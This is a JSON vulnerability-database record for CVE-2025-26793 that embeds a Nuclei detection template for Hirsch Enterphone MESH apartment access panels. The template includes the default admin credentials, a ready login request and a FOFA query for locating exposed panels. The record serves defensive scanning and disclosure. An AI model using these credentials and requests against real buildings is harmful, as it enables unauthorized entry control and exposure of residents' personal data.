{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2025-26793/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2025-26793/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2025-26793/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2025-26793/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2025-26793/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2025-26793"},"sightings":{"href":"/api/v1/sightings/cve-2025-26793"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2025/CVE-2025-26793.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2025-26793\n\ninfo:\n  name: FREEDOM Administration - Default Login\n  author: Eric Daigle,DhiyaneshDK\n  severity: critical\n  description: |\n    The Web GUI configuration panel of Hirsch (formerly Identiv and Viscount) Enterphone MESH through 2024 ships with default credentials (username freedom, password viscount). The administrator is not prompted to change these credentials on initial configuration, and changing the credentials requires many steps. Attackers can use the credentials over the Internet via mesh.webadmin.MESHAdminServlet to gain access to dozens of Canadian and U.S. apartment buildings and obtain building residents' PII. NOTE- the Supplier's perspective is that the \"vulnerable systems are not following manufacturers' recommendations to change the default password.\"\n  impact: |\n    Attackers can gain unauthorized access to building management systems using default credentials, potentially exposing residents' personally identifiable information and controlling access to apartment buildings.\n  remediation: |\n    Change default credentials immediately to strong, unique passwords as recommended in the manufacturer's security guidelines.\n  reference:\n    - https://www.ericdaigle.ca/posts/breaking-into-dozens-of-apartments-in-five-minutes/\n    - https://news.ycombinator.com/item?id=43160884\n    - https://support.identiv.com/products/physical-access/hirsch/\n  classification:\n    epss-score: 0.02396\n    epss-percentile: 0.83279\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: title=\"FREEDOM Administration\"\n  tags: cve,cve2025,freedom,admin,mesh,vkev,vuln\n\nvariables:\n  username: \"freedom\"\n  password: \"viscount\"\n\nhttp:\n  - raw:\n      - |\n        POST /mesh/servlet/mesh.webadmin.MESHAdminServlet?requestedAction=login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        formLoginName={{username}}&formLoginPassword={{password}}\n\n    redirects: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Administration: Controlled Areas\"\n          - \"Log Out\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a0048304602210089cd9d1ef760c34635cb5bbbe8546c6541dd710f6b7d434c07857df8d93033eb022100eb884f92c9901314142469239bcbf48478094d17822d804de31c9de864c57bc6:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2025-26793"}